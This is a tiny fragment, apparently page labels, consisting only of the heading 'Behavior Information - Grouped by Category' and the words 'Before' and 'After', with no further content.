Behavior Information - Grouped by Category

Before

After